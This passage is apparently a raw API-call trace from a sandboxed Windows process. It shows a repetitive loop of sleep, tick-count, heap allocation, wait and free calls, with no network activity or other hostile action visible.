dwFlags=0x8, lpMem=0x32e880e0 | out: hHeap=0x2150000) returned 1 [0187.064] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.064] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.066] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.069] GetTickCount () returned 0x20b4205 [0187.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0187.069] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.069] GetTickCount () returned 0x20b4205 [0187.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ba0 [0187.069] GetTickCount () returned 0x20b4205 [0187.069] GetTickCount () returned 0x20b4205 [0187.069] GetTickCount () returned 0x20b4205 [0187.069] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ba0 | out: hHeap=0x2150000) returned 1 [0187.069] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.069] GetTickCount () returned 0x20b4205 [0187.069] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c00 [0187.069] GetTickCount () returned 0x20b4205 [0187.069] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87c00 | out: hHeap=0x2150000) returned 1 [0187.069] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0187.069] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.071] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.073] GetTickCount () returned 0x20b4aaa [0187.073] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0187.073] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.073] GetTickCount () returned 0x20b4aaa [0187.073] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88140 [0187.073] GetTickCount () returned 0x20b4aaa [0187.073] GetTickCount () returned 0x20b4aaa [0187.073] GetTickCount () returned 0x20b4aaa [0187.073] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88140 | out: hHeap=0x2150000) returned 1 [0187.073] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.073] GetTickCount () returned 0x20b4aaa [0187.073] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87db0 [0187.073] GetTickCount () returned 0x20b4aaa [0187.073] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87db0 | out: hHeap=0x2150000) returned 1 [0187.073] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0187.073] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.076] GetTickCount () returned 0x20b5340 [0187.076] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0187.076] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.076] GetTickCount () returned 0x20b5340 [0187.076] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c00 [0187.076] GetTickCount () returned 0x20b5340 [0187.076] GetTickCount () returned 0x20b5340 [0187.076] GetTickCount () returned 0x20b5340 [0187.076] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87c00 | out: hHeap=0x2150000) returned 1 [0187.077] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.077] GetTickCount () returned 0x20b5340 [0187.077] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e878a0 [0187.077] GetTickCount () returned 0x20b5340 [0187.080] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e878a0 | out: hHeap=0x2150000) returned 1 [0187.080] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0187.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.084] GetTickCount () returned 0x20b5bd6 [0187.084] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.084] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.084] GetTickCount () returned 0x20b5bd6 [0187.084] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88290 [0187.084] GetTickCount () returned 0x20b5bd6 [0187.085] GetTickCount () returned 0x20b5bd6 [0187.085] GetTickCount () returned 0x20b5bd6 [0187.085] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88290 | out: hHeap=0x2150000) returned 1 [0187.085] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.085] GetTickCount () returned 0x20b5bd6 [0187.085] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f60 [0187.085] GetTickCount () returned 0x20b5bd6 [0187.085] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f60 | out: hHeap=0x2150000) returned 1 [0187.085] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.085] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.086] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.089] GetTickCount () returned 0x20b647c [0187.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0187.089] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.089] GetTickCount () returned 0x20b647c [0187.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87720 [0187.089] GetTickCount () returned 0x20b647c [0187.089] GetTickCount () returned 0x20b647c [0187.089] GetTickCount () returned 0x20b647c [0187.089] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87720 | out: hHeap=0x2150000) returned 1 [0187.089] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.089] GetTickCount () returned 0x20b647c [0187.089] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e877b0 [0187.089] GetTickCount () returned 0x20b647c [0187.090] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e877b0 | out: hHeap=0x2150000) returned 1 [0187.090] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0187.090] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.093] GetTickCount () returned 0x20b6d12 [0187.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.093] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.093] GetTickCount () returned 0x20b6d12 [0187.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87990 [0187.093] GetTickCount () returned 0x20b6d12 [0187.093] GetTickCount () returned 0x20b6d12 [0187.093] GetTickCount () returned 0x20b6d12 [0187.093] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87990 | out: hHeap=0x2150000) returned 1 [0187.093] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.093] GetTickCount () returned 0x20b6d12 [0187.093] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87f60 [0187.093] GetTickCount () returned 0x20b6d12 [0187.093] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87f60 | out: hHeap=0x2150000) returned 1 [0187.093] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.097] GetTickCount () returned 0x20b75a8 [0187.097] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bf0 [0187.097] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.097] GetTickCount () returned 0x20b75a8 [0187.097] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e879f0 [0187.097] GetTickCount () returned 0x20b75a8 [0187.097] GetTickCount () returned 0x20b75a8 [0187.097] GetTickCount () returned 0x20b75a8 [0187.097] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e879f0 | out: hHeap=0x2150000) returned 1 [0187.097] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.097] GetTickCount () returned 0x20b75a8 [0187.097] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87cf0 [0187.097] GetTickCount () returned 0x20b75a8 [0187.097] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87cf0 | out: hHeap=0x2150000) returned 1 [0187.097] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bf0 | out: hHeap=0x2150000) returned 1 [0187.097] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.102] GetTickCount () returned 0x20b7e4d [0187.102] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0187.102] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.102] GetTickCount () returned 0x20b7e4d [0187.102] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87db0 [0187.102] GetTickCount () returned 0x20b7e4d [0187.102] GetTickCount () returned 0x20b7e4d [0187.102] GetTickCount () returned 0x20b7e4d [0187.102] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87db0 | out: hHeap=0x2150000) returned 1 [0187.102] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.102] GetTickCount () returned 0x20b7e4d [0187.102] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88140 [0187.102] GetTickCount () returned 0x20b7e4d [0187.102] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88140 | out: hHeap=0x2150000) returned 1 [0187.102] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0187.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.106] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.108] GetTickCount () returned 0x20b86e3 [0187.108] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0187.108] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.108] GetTickCount () returned 0x20b86e3 [0187.108] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87e70 [0187.108] GetTickCount () returned 0x20b86e3 [0187.108] GetTickCount () returned 0x20b86e3 [0187.108] GetTickCount () returned 0x20b86e3 [0187.108] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87e70 | out: hHeap=0x2150000) returned 1 [0187.108] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.108] GetTickCount () returned 0x20b86e3 [0187.108] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e877e0 [0187.108] GetTickCount () returned 0x20b86e3 [0187.108] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e877e0 | out: hHeap=0x2150000) returned 1 [0187.108] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0187.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.111] GetTickCount () returned 0x20b8f79 [0187.111] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0187.111] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.111] GetTickCount () returned 0x20b8f79 [0187.111] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87a20 [0187.111] GetTickCount () returned 0x20b8f79 [0187.111] GetTickCount () returned 0x20b8f79 [0187.112] GetTickCount () returned 0x20b8f79 [0187.112] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87a20 | out: hHeap=0x2150000) returned 1 [0187.112] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.112] GetTickCount () returned 0x20b8f79 [0187.112] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e879f0 [0187.112] GetTickCount () returned 0x20b8f79 [0187.112] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e879f0 | out: hHeap=0x2150000) returned 1 [0187.112] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0187.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.113] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.117] GetTickCount () returned 0x20b980f [0187.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0187.117] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.117] GetTickCount () returned 0x20b981f [0187.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ba0 [0187.117] GetTickCount () returned 0x20b981f [0187.117] GetTickCount () returned 0x20b981f [0187.117] GetTickCount () returned 0x20b981f [0187.117] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ba0 | out: hHeap=0x2150000) returned 1 [0187.117] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.117] GetTickCount () returned 0x20b981f [0187.117] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e878d0 [0187.117] GetTickCount () returned 0x20b981f [0187.117] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e878d0 | out: hHeap=0x2150000) returned 1 [0187.117] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0187.117] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.121] GetTickCount () returned 0x20ba0b5 [0187.121] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0187.121] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.121] GetTickCount () returned 0x20ba0b5 [0187.121] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88290 [0187.121] GetTickCount () returned 0x20ba0b5 [0187.121] GetTickCount () returned 0x20ba0b5 [0187.121] GetTickCount () returned 0x20ba0b5 [0187.121] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88290 | out: hHeap=0x2150000) returned 1 [0187.121] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.121] GetTickCount () returned 0x20ba0b5 [0187.121] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87bd0 [0187.121] GetTickCount () returned 0x20ba0b5 [0187.121] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87bd0 | out: hHeap=0x2150000) returned 1 [0187.121] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0187.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.125] GetTickCount () returned 0x20ba94b [0187.125] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0187.125] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.125] GetTickCount () returned 0x20ba94b [0187.125] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87990 [0187.125] GetTickCount () returned 0x20ba94b [0187.125] GetTickCount () returned 0x20ba94b [0187.126] GetTickCount () returned 0x20ba94b [0187.126] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87990 | out: hHeap=0x2150000) returned 1 [0187.126] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.126] GetTickCount () returned 0x20ba94b [0187.126] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87c00 [0187.126] GetTickCount () returned 0x20ba94b [0187.126] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87c00 | out: hHeap=0x2150000) returned 1 [0187.126] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0187.126] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.129] GetTickCount () returned 0x20bb1e1 [0187.129] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ef0 [0187.129] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.129] GetTickCount () returned 0x20bb1e1 [0187.129] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b40 [0187.129] GetTickCount () returned 0x20bb1e1 [0187.129] GetTickCount () returned 0x20bb1e1 [0187.129] GetTickCount () returned 0x20bb1e1 [0187.129] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b40 | out: hHeap=0x2150000) returned 1 [0187.129] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.129] GetTickCount () returned 0x20bb1e1 [0187.129] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e879f0 [0187.129] GetTickCount () returned 0x20bb1e1 [0187.129] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e879f0 | out: hHeap=0x2150000) returned 1 [0187.129] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ef0 | out: hHeap=0x2150000) returned 1 [0187.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.136] GetTickCount () returned 0x20bba87 [0187.136] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0187.136] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.136] GetTickCount () returned 0x20bba87 [0187.136] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87990 [0187.136] GetTickCount () returned 0x20bba87 [0187.136] GetTickCount () returned 0x20bba87 [0187.136] GetTickCount () returned 0x20bba87 [0187.136] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87990 | out: hHeap=0x2150000) returned 1 [0187.136] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.136] GetTickCount () returned 0x20bba87 [0187.136] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87b40 [0187.136] GetTickCount () returned 0x20bba87 [0187.136] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87b40 | out: hHeap=0x2150000) returned 1 [0187.136] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0187.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.138] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.139] GetTickCount () returned 0x20bc31d [0187.139] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64ff0 [0187.139] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.139] GetTickCount () returned 0x20bc31d [0187.139] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e876c0 [0187.139] GetTickCount () returned 0x20bc31d [0187.139] GetTickCount () returned 0x20bc31d [0187.139] GetTickCount () returned 0x20bc31d [0187.139] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e876c0 | out: hHeap=0x2150000) returned 1 [0187.140] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.140] GetTickCount () returned 0x20bc31d [0187.140] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87d80 [0187.140] GetTickCount () returned 0x20bc31d [0187.140] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87d80 | out: hHeap=0x2150000) returned 1 [0187.140] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64ff0 | out: hHeap=0x2150000) returned 1 [0187.140] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.143] GetTickCount () returned 0x20bcbb3 [0187.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0187.143] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.143] GetTickCount () returned 0x20bcbb3 [0187.143] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e881a0 [0187.143] GetTickCount () returned 0x20bcbb3 [0187.143] GetTickCount () returned 0x20bcbb3 [0187.143] GetTickCount () returned 0x20bcbb3 [0187.143] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e881a0 | out: hHeap=0x2150000) returned 1 [0187.143] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.144] GetTickCount () returned 0x20bcbb3 [0187.144] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88020 [0187.144] GetTickCount () returned 0x20bcbb3 [0187.144] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88020 | out: hHeap=0x2150000) returned 1 [0187.144] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e30 | out: hHeap=0x2150000) returned 1 [0187.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.147] GetTickCount () returned 0x20bd449 [0187.147] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0187.147] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.147] GetTickCount () returned 0x20bd449 [0187.147] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87960 [0187.147] GetTickCount () returned 0x20bd449 [0187.147] GetTickCount () returned 0x20bd449 [0187.147] GetTickCount () returned 0x20bd449 [0187.147] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87960 | out: hHeap=0x2150000) returned 1 [0187.147] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.147] GetTickCount () returned 0x20bd449 [0187.147] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e881a0 [0187.147] GetTickCount () returned 0x20bd449 [0187.147] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e881a0 | out: hHeap=0x2150000) returned 1 [0187.147] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0187.147] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.150] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.152] GetTickCount () returned 0x20bdcee [0187.152] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64b70 [0187.152] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.152] GetTickCount () returned 0x20bdcee [0187.152] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ae0 [0187.152] GetTickCount () returned 0x20bdcee [0187.152] GetTickCount () returned 0x20bdcee [0187.152] GetTickCount () returned 0x20bdcee [0187.152] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87ae0 | out: hHeap=0x2150000) returned 1 [0187.152] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.152] GetTickCount () returned 0x20bdcee [0187.152] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e88020 [0187.152] GetTickCount () returned 0x20bdcee [0187.152] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e88020 | out: hHeap=0x2150000) returned 1 [0187.152] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0187.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.154] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.155] GetTickCount () returned 0x20be584 [0187.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0187.155] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.155] GetTickCount () returned 0x20be584 [0187.155] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87d80 [0187.155] GetTickCount () returned 0x20be584 [0187.155] GetTickCount () returned 0x20be584 [0187.155] GetTickCount () returned 0x20be584 [0187.155] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87d80 | out: hHeap=0x2150000) returned 1 [0187.155] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.156] GetTickCount () returned 0x20be584 [0187.156] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87de0 [0187.156] GetTickCount () returned 0x20be584 [0187.156] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e87de0 | out: hHeap=0x2150000) returned 1 [0187.156] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0187.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.157] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0187.161] GetTickCount () returned 0x20bee1a [0187.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0187.161] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0187.161] GetTickCount () returned 0x20bee1a [0187.161] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e878a0 [0187.162] GetTickCount () returned 0x20bee1a [0187.162] GetTickCount () returned 0x20bee1a [0187.162] GetTickCount () returned 0x20bee1a [0187.162] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e878a0 | out: hHeap=0x2150000) returned 1 [0187.162] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0187.162] GetTickCount () returned 0x20bee1a [0187.162] RtlAllocateHeap (HeapHandle=0x2150000, 